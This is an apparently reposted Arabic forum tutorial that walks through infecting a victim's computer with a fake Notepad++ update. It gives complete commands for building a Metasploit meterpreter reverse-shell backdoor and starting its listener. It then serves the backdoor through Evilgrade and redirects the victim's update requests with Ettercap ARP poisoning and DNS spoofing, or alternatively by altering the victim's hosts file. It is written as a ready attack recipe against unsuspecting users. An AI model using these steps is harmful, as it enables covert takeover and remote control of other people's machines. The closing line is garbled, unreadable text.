بسم الله الرحمان الرحيم
اليوم
سنقوم في هذا الاختراق بعمل تحديث وهمي وارساله الى برنامج على جهاز الضحية
البرامج التى يمكن تزييف تحديثاتها:
·sunjava
·winzip
·winamp
·itunes
·speedbit
·openoffice
·linkedin
·osx
·notepadplus
·dap
في هذا الشرح سنستخدم برنامج notepad++
و ستكون طريقة العمل كالاتي :
1.نقوم بتكوين Backdoor باستخدام مشروع ميتاسبلويت بالخيارات التي تناسبنا.
2.استخدام مشروع Evilgrade الذي سيقوم بتشغيل Web Server يحتوي على تحديث مزيّف لبرنامج Notepad++.
3.استخدام برنامج Ettercap لعمل dns spoofing و بالتالي تحويل أي طلب مرسل لموقع Notepad++ الى الويب سيرفر الذي قام Evilgrade بتشغيله.(اذا كنا متصلين بالضحية عن طريق الشبكة المحلية)
و اذا كنا متصلين بها عن طريق الانترنت فعلينا تغيير ملف hosts
الموجود بمسارC:\Windows\System32\drivers\etc
على جهاز الضحية (سنتطرق الى هذا لاحقا)
لنبدء الشرح (ساستخدم نظام لينكس في الشرح )
نفتح شيل ونكتب الامر
/metasploit/msfpayload windows/meterpreter/reverse_tcp LHOST=ip LPORT=port X > agent.exe
حيث
Metasploit: مسار برنامج ميتاسبلويت
Reverse_tcp:لاختيار الاتصال العكسي
ip:ايبي جهازك
PORT:البورت
Agent.exe:اسم الباكدور (اتركه كما هو)
الان كوننا الباك دور نقوم بنقله الى برنامج evilgrade
بالامر:
cp agent.exe /pentest/evilgrade/agent
حيث pentest هو مسار البرنامج
سيسئلك اذا كنت تريد استبدال الباكدور بالباكدور الذي ياتي مع البرنامج اجب بنعم
الان نقوم بالتنصت على البورت الذي اخترناه بالامر
/metasploit/msfconsole
حيث
Metasploit: مسار برنامج ميتاسبلويت
Use exploit/multi/handler
set LHOST=ip
ip:ايبي جهازك
set LPORT=port
PORT:البورت
set payload windows/meterpreter/reverse_tcp
exploit
تم التنصت الان نشغل evilgrade
نفتح شيل جديد و نكتب
Cd /pentest/evilgrade
./evilgrade
Conf notepadplus
Show option
الان نسجل قيمة ال virtual host و هي notepad-plus.sourceforge.net
ذلك هو الدومين الذي سنستعمله ثم نشغل السيرفر بالامر
Start
كل شيئ تمام ماعلينا الان الى عمل ال دي ا ناس سبوفينق
نفتح شيل جديد نحول صلاحيتنا الى رووت
نفعل ip forwarding :
Echo 1 > proc/sys/net/ipv4/ip_forward
نفتح etter.dns
Nano /usr/ettercap/etter.dns
حيث usr : مسار البرنامج
نغيير www.microsoft.com الى notepad-plus.sourceforge.net
و الايبي المقابل الى ايبي جهازنا نحفظ التغييرات و نخرج
نكتب الامر
// Ettercap –T –q –M arp:remote –P dns_spoof –i eth0
حيث eth0هو ال interface
تم الامر الان حينما تفتح الضحية برنامج notepadplus ستفتح له نافذة تخبره بوجود تحديثات وحينما يوافق على التحديث سيتم تنزيل الباكدور و تشغيله على جهاز الضحية و عليك الاختراق
هذا بالنسبة للوكال وبالنسبة للانترنت الحل هو اضافة الدومين وال ايبي الى ملف hosts
ثم استبداله في جهاز الضحية (من الافضل الاكتفاء بهذا الاختراق في الشبكات المحلية)
تحميل : http://www.infobyte.com.ar/developments.htmlevilgrade
تحميل : http://www.ettercap.sourceforge.net ettercap
تحميل :http://www.metasploit.com metasploit
منقول : )
hojvhr k/hl ,dk],. uk 'vdr jp]de lgyl